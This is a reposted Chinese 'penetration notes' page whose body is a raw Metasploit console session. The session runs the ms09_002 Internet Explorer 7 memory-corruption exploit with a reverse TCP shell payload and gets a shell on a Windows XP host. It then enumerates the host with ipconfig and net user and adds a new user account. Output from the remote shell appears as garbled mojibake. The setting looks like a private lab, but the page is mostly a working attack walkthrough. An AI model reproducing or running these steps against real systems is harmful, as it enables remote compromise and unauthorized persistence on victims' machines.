滲透雜記-2013-07-13 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7

來源:互聯網
上載者:User

標籤:name   padding   shell   admin   default   shel   web   version   rand   

Welcome to the Metasploit Web Console! | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ | ( |\__ \ | | | ( | | | _| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| _| =[ metasploit v3.4.2-dev [core:3.4 api:1.0] + -- --=[ 566 exploits - 283 auxiliary + -- --=[ 210 payloads - 27 encoders - 8 nops =[ svn r9834 updated 308 days ago (2010.07.14) Warning: This copy of the Metasploit Framework was last updated 308 days ago. We recommend that you update the framework at least every other day. For information on updating your copy of Metasploit, please see: http://www.metasploit.com/redmine/projects/framework/wiki/Updating >> use windows/browser/ms09_002_memory_corruption >> set payload windows/shell/reverse_tcp payload => windows/shell/reverse_tcp >> show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7 >> set SRVHOST 172.16.2.100 SRVHOST => 172.16.2.100 >> set LHOST 172.16.2.100 LHOST => 172.16.2.100 >> show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 172.16.2.100 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process LHOST 172.16.2.100 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7 >> exploit [*] Exploit running as background job. [*] Started reverse handler on 172.16.2.100:4444 [*] Using URL: http://172.16.2.100:8080/9wZVWxuy [*] Server started. >> back >> sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 shell 172.16.2.100:4444 -> 172.16.2.120:1125 >> sessions -i 1 sessions -i 1 ‘sessions‘ 2?ê??ú2??òía2??üá?£?ò22?ê??é??DDμ?3ìDò ?ò?ú′|àí???t?£ C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??> >> ipconfig /all ipconfig /all Windows IP Configuration Host Name . . . . . . . . . . . . : www-95a235b5556 Primary Dns Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Unknown IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No Ethernet adapter C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??> >> net user net user \\WWW-95A235B5556 μ?ó??§?ê?§ ------------------------------------------------------------------------------- Administrator Guest HelpAssistant SUPPORT_388945a0 ?üá?3é1|íê3é?£ C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??> >> net user shentouceshiwy /add net user shentouceshiwy /add ?üá?3é1|íê3é?£ C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??> >> net user net user \\WWW-95A235B5556 μ?ó??§?ê?§ ------------------------------------------------------------------------------- Administrator Guest HelpAssistant shentouceshiwy SUPPORT_388945a0 ?üá?3é1|íê3é?£

滲透雜記-2013-07-13 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7

相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.